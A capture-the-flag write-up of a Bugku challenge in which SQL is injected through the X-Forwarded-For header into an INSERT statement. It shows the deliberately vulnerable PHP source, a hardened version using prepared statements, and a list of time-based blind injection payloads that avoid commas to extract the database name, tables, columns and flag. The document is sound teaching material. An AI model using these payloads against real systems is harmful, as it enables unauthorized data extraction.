[Bugku] INSERT INTO Injection
I have been going back over the basics recently and worked through sqli-labs again, only to find that a few tricks still had not been collected there. That reminded me of an INSERT injection challenge on Bugku, so I am writing it up here as a record.
The challenge hands you the source code right away, and the hint is "write a Python script". My guess was that this one needs blind injection; for the other injection types a script would not really be necessary.
<?php
// Challenge source as given (deliberately vulnerable; comments added for reading).
error_reporting(0);

function getIp()
{
    $ip = '';
    // X-Forwarded-For is fully attacker-controlled and is preferred over REMOTE_ADDR.
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else
    {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    // Only the first comma-separated segment survives: this is why commas are "filtered".
    $ip_arr = explode(',', $ip);
    return $ip_arr[0];
}

$host = "localhost";
$user = "";
$pass = "";
$db   = "";
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :' . $ip;
// The header value is interpolated straight into the INSERT statement.
$sql = "insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
The injection point is clear: the X-Forwarded-For HTTP header. But commas are filtered (getIp() splits the header on ',' and keeps only the first segment, so everything after a comma is discarded), which rules out the usual updatexml and extractvalue error-based injection. Fortunately, select case when xxx then xxx else xxx end still works. And because commas are filtered, substr and substring cannot be called in their normal form either, so from 1 for 1 has to be used instead.
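For contrast, here is the same handler written so that the header value can no longer reach the statement as code. This is an added example, not the challenge's code; it assumes a mysqli connection and a client_ip(ip) column, and the credentials are placeholders.

```php
<?php
// Added example (not the challenge's code): the handler hardened in two places.
// 1) The value taken from X-Forwarded-For must parse as a literal IP address.
// 2) The INSERT uses a prepared statement, so the value is bound as data.
// Assumptions: a mysqli connection and a client_ip(ip VARCHAR(45)) table.

function getClientIp(): ?string
{
    $raw = $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'] ?? '';
    // Proxies append hops separated by commas; keep the first entry, as the original did.
    $first = trim(explode(',', $raw)[0]);
    // Anything that is not an IPv4/IPv6 literal is rejected. The quotes, spaces and
    // parentheses in the blind-injection payloads above all fail this check.
    $ip = filter_var($first, FILTER_VALIDATE_IP);
    return $ip === false ? null : $ip;
}

function recordClientIp(mysqli $db, string $ip): bool
{
    // Placeholder instead of string interpolation: $ip is sent as a parameter and is
    // never parsed as part of the SQL statement, whatever it contains.
    $stmt = $db->prepare('INSERT INTO client_ip (ip) VALUES (?)');
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('s', $ip);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

$ip = getClientIp();
if ($ip === null) {
    http_response_code(400);
    exit('invalid client address');
}
echo 'your ip is :' . htmlspecialchars($ip, ENT_QUOTES, 'UTF-8');

$db = new mysqli('localhost', 'user', 'pass', 'dbname'); // placeholder credentials
if ($db->connect_error) {
    exit('Unable to connect');
}
recordClientIp($db, $ip);
```

Even when it validates, X-Forwarded-For is still supplied by the client, so it should only be used to identify the caller when the request arrives through a proxy you control.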
Start with manual injection testing: capture the request and add an X-Forwarded-For header:
X-Forwarded-For:127.0.0.1' and (select case when (length(database())=5) then sleep(5) else 1 end) and '1'='1
Manual testing shows the database name has length 5. Next, write out a general injection statement and it can be run in a loop.
The payloads are as follows:
127.0.0.1' and (select case when (ascii(substr((select database()) from 1 for 1))=119) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (length((select group_concat(table_name)from information_schema.tables where table_schema=database()))=14) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()) from 1 for 1))=99) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (length((select group_concat(column_name)from information_schema.columns where table_name='flag'))=4) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag') from 1 for 1))=102) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (length((select group_concat(flag)from flag))=32) then sleep(5) else 1 end) and '1'='1
127.0.0.1' and (select case when (ascii(substr((select group_concat(flag)from flag) from 1 for 1))=99) then sleep(5) else 1 end) and '1'='1
With all the payloads written out, the script is straightforward: use binary search on the ASCII value, add an X-Forwarded-For header to the request, and set it to the payload.